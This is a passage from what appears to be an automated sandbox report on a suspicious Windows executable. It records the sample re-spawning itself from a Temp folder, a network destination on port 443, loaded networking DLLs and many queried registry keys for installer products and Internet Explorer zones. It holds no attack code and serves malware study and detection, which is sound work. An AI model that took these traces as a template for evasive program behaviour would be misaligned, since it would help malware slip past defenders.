"62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1992 } ], "threads": [ "2840", "9472", "11160", "11036", "6820", "8848", "388", "6172", "6836" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x0015d000", "Bitness": "32-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } } ], "anomaly": [], "processtree": [ { "name": "f1ffd3c13b7bd7f498e8.exe", "pid": 9224, "parent_id": 4168, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "children": [ { "name": "f1ffd3c13b7bd7f498e8.exe", "pid": 3552, "parent_id": 9224, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "children": [], "threads": [ "2840", "9472", "11160", "11036", "6820", "8848", "388", "6172", "6836" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x0015d000", "Bitness": "32-bit" } } ], "threads": [ "3892", "6000", "11256" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x00017000", "Bitness": "32-bit" } } ], "summary": { "files": [ "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls", "C:\\Windows\\System32\\kernel.appcore.dll", "C:\\Windows\\System32\\bcryptPrimitives.dll", "\\Device\\CNG", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe.cfg", "C:\\Windows\\System32\\msctf.dll", "C:\\Windows\\sysnative\\C_932.NLS", "C:\\Windows\\sysnative\\C_949.NLS", "C:\\Windows\\sysnative\\C_950.NLS", "C:\\Windows\\sysnative\\C_936.NLS", "C:\\Windows\\System32\\coml2.dll", "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP", "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\USER32.dll.mui", "C:\\Windows\\System32\\textinputframework.dll", "C:\\Windows\\System32\\CoreUIComponents.dll", "C:\\Windows\\System32\\CoreMessaging.dll", "C:\\Windows\\System32\\ntmarta.dll", "C:\\Windows\\System32\\WinTypes.dll", "C:\\Windows\\System32\\SHCore.dll", "C:\\Windows\\SystemResources\\USER32.dll.mun", "C:\\Program Files\\Qemu-ga\\qemu-ga.exe", "C:\\Program Files\\qga\\qga.exe", "C:\\Windows\\SysWOW64\\msvbvm60.dll", "C:\\Windows\\System32\\winnsi.dll", "C:\\Users\\pacop\\AppData\\Local\\Temp\\urlmon.dll", "C:\\Windows\\System32\\urlmon.dll", "C:\\Users\\pacop\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\ESE\\", "\\Device\\RasAcd", "C:\\Windows\\System32\\mswsock.dll", "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\mswsock.dll.mui", "C:\\Windows\\System32\\wshqos.dll", "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\wshqos.dll.mui" ], "read_files": [], "write_files": [ "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP", "\\Device\\RasAcd" ], "delete_files": [], "keys": [ "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration", "HKEY_CURRENT_USER", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\SafeProcessSearchMode", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\932", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\949", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\950", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\936", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\OLE\\Tracing", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1ffd3c13b7bd7f498e8.exe", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\OOBE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\AppCompatClassName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\CTF\\EnableAnchorContext", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\IsVailContainer", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Input", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\ResyncResetTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\MaxResyncAttempts", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OLEAUT\\UserEra", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Control Panel\\International\\Calendars\\TwoDigitYearMax", "HKEY_CURRENT_USER\\Control Panel\\International\\Calendars\\TwoDigitYearMax", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C49115752914EB648805A289B86E3BAB", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\DEDD26948C27133438B0903EEA696564", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\DEDD26948C27133438B0903EEA696564", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\E9F59850C17A7A840A2E45D143500A35", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263", "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78", "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9", "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9", "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\", "HKEY_LOCAL_MACHINE\\ZoneMap\\Ranges\\", "HKEY_CURRENT_USER\\ZoneMap\\Ranges\\", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "HKEY_LOCAL_MACHINE\\System\\Setup", "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\f1ffd3c13b7bd7f498e8.exe", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\*", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\", 